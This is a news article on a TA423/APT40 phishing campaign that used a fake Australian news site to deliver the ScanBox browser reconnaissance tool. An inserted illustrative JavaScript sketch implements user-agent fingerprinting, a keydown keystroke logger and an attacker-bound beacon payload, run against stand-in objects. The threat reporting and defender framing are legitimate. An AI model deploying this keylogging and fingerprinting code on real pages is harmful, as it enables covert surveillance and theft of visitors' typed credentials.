A China-based cyberespionage group targeted Australian officials with reconnaissance malware designed to collect details about victims that the attackers could then use for more precisely targeted follow-on attacks, researchers with cybersecurity firm Proofpoint and the PwC Threat Intelligence team said in joint research published Tuesday.
The campaign, which focused on government, energy and manufacturing personnel in the Asia-Pacific region, used phishing emails to direct targets to a fake news outlet, the researchers said. The attackers, tracked variously as TA423, Red Ladon and APT40, built the site to deliver a reconnaissance tool known as ScanBox.
The group has been active for nearly a decade, since at least 2013, with a primary focus on the South China Sea, though its victims span the globe. In 2021, the U.S. Department of Justice tied APT40 to China's Ministry of State Security.
In this latest campaign, which ran from April to June, the group appeared to focus on global heavy-industry manufacturers that maintain fleets of wind turbines in the South China Sea.
The phony "Australian Morning News" site contained images and stories lifted from legitimate news organizations, the researchers said. A previous operation believed to be associated with the group targeted Cambodia in 2018 using much the same approach.
With subject lines such as “Sick Leave,” “User Research” and “Request Cooperation,” the phishing emails explained that the sender was starting a “humble news website” and wanted feedback.
ScanBox, the tool the attackers intended to run on victims' machines, dates back to at least 2014. It is a JavaScript-based reconnaissance framework that executes in the visitor's browser when the malicious page loads, rather than being installed as a file on disk. It allows attackers to log keystrokes and to collect a range of environment details that help calibrate future exploitation, such as software versions and configurations, operating system details and browser versions.
A 2015 PwC analysis concluded that numerous China-linked cyber operations had used the tool over several years. In February 2021, for instance, Proofpoint observed another China-aligned group, TA413, using it to target Tibetan organizations globally.
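As an added illustration, and not ScanBox's own code or anything from the Proofpoint/PwC report, the following JavaScript sketches the kind of browser-side reconnaissance described above: fingerprinting the operating system and browser from navigator and screen data, buffering keystrokes from a keydown listener, and packaging both into a beacon body for the attacker's server. The navigator, screen and document objects are constructed stand-ins so the script also runs under Node; the field names, the beacon layout and the victim identifier are assumptions.

```javascript
// Added example: a sketch of ScanBox-style browser reconnaissance written for
// this page. It is not ScanBox's code; field names and beacon format are assumed.

// Coarse OS detection from the User-Agent string. Order matters: Android UAs
// also contain "Linux", and iOS UAs contain "Mac OS X".
function osFromUserAgent(ua) {
  if (/Windows NT/.test(ua)) return "Windows";
  if (/Android/.test(ua)) return "Android";
  if (/iPhone|iPad/.test(ua)) return "iOS";
  if (/Mac OS X/.test(ua)) return "macOS";
  if (/Linux/.test(ua)) return "Linux";
  return "unknown";
}

// Browser name and version. Again order matters: Chrome and Edge UAs also
// carry a "Safari/" token, and Edge carries "Chrome/".
function browserFromUserAgent(ua) {
  let m;
  if ((m = /Edg\/([\d.]+)/.exec(ua))) return `Edge ${m[1]}`;
  if ((m = /Chrome\/([\d.]+)/.exec(ua))) return `Chrome ${m[1]}`;
  if ((m = /Firefox\/([\d.]+)/.exec(ua))) return `Firefox ${m[1]}`;
  if ((m = /Version\/([\d.]+).*Safari\//.exec(ua))) return `Safari ${m[1]}`;
  return "unknown";
}

// Collect the environment details the article lists: OS, browser version,
// platform, language, installed plugins and display geometry.
function collectFingerprint(nav, scr) {
  return {
    userAgent: nav.userAgent,
    os: osFromUserAgent(nav.userAgent),
    browser: browserFromUserAgent(nav.userAgent),
    platform: nav.platform,
    language: nav.language,
    plugins: Array.from(nav.plugins || [], (p) => `${p.name}/${p.version || "?"}`),
    screen: `${scr.width}x${scr.height}@${scr.colorDepth}bpp`,
  };
}

// Keystroke capture: a keydown listener buffers printable keys plus Enter/Tab
// until flush(); a real implant would post the buffer on a timer.
function createKeyLogger(target) {
  const buf = [];
  const onKey = (ev) => {
    if (ev.key.length === 1) buf.push(ev.key);
    else if (ev.key === "Enter" || ev.key === "Tab") buf.push(`<${ev.key}>`);
  };
  target.addEventListener("keydown", onKey);
  return {
    flush() { const out = buf.join(""); buf.length = 0; return out; },
    stop() { target.removeEventListener("keydown", onKey); },
  };
}

// Beacon body of the kind such a framework POSTs to its server (assumed layout).
function buildBeacon(victimId, fingerprint, keystrokes) {
  return JSON.stringify({ id: victimId, fp: fingerprint, keys: keystrokes });
}

// Constructed stand-ins for navigator, screen and document so this runs under Node.
const FAKE_NAVIGATOR = {
  userAgent:
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 " +
    "(KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36",
  platform: "Win32",
  language: "en-AU",
  plugins: [{ name: "PDF Viewer", version: "" }],
};
const FAKE_SCREEN = { width: 1920, height: 1080, colorDepth: 24 };

class FakeDocument {
  constructor() { this.listeners = new Map(); }
  addEventListener(type, fn) {
    if (!this.listeners.has(type)) this.listeners.set(type, []);
    this.listeners.get(type).push(fn);
  }
  removeEventListener(type, fn) {
    this.listeners.set(type, (this.listeners.get(type) || []).filter((f) => f !== fn));
  }
  dispatchEvent(ev) {
    for (const fn of this.listeners.get(ev.type) || []) fn(ev);
  }
}

// Drive the whole flow on the constructed inputs and return the beacon body.
function demo() {
  const doc = new FakeDocument();
  const logger = createKeyLogger(doc);
  for (const key of ["p", "a", "s", "s", "Enter", "Shift"]) {
    doc.dispatchEvent({ type: "keydown", key });
  }
  const fp = collectFingerprint(FAKE_NAVIGATOR, FAKE_SCREEN);
  const beacon = buildBeacon("host-1", fp, logger.flush());
  logger.stop();
  return beacon;
}

if (typeof require !== "undefined" && require.main === module) console.log(demo());
```

The point for defenders is that everything above runs inside the browser session: nothing is written to disk, so the observable artifacts are the page's script and the outbound POSTs it generates, which puts detection at the web proxy and in browser telemetry rather than in file-based antivirus.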
Analysis of the latest operation showed links to earlier activity from the group dating back to March 2021, the researchers found. Phishing emails sent between March 2021 and September 2021 carried malicious RTF files that delivered Meterpreter, the Metasploit framework's payload that gives an attacker an interactive session for running commands on the victim's computer.
In March 2022 the operation picked up again with a malicious Microsoft Word document, and the current wave began in April using attacker-controlled domains that led victims to the phony news website.